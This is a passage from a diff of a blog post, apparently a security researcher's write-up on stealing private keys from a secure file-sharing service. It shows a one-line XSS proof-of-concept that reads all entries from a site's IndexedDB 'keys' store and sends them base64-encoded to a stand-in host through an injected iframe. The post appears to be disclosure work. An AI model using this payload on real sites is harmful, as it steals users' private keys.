timvisee/timvisee.com/content/blog/2019-10-27_stealing-private-keys-from-secure-file-sharing-service/index.md

 Now that we've implemented these steps, let's build a proof of concept.

 With some effort, I compressed the code from above into the following one-liner.
-This took me some time, but completed this in about 1:30 after starting.
 With my own short domain, it counts 250 characters, just below the 255 character limit.
 Beautiful!

 ```html
 <script>setTimeout(()=>indexedDB.open("companyname").onsuccess=(a)=>a.target.result.transaction(["keys"]).objectStore("keys").getAll().onsuccess=(b)=>$('body').append('<iframe src="//example.org?k='+btoa(JSON.stringify(b.target.result))+'">'),1);</script>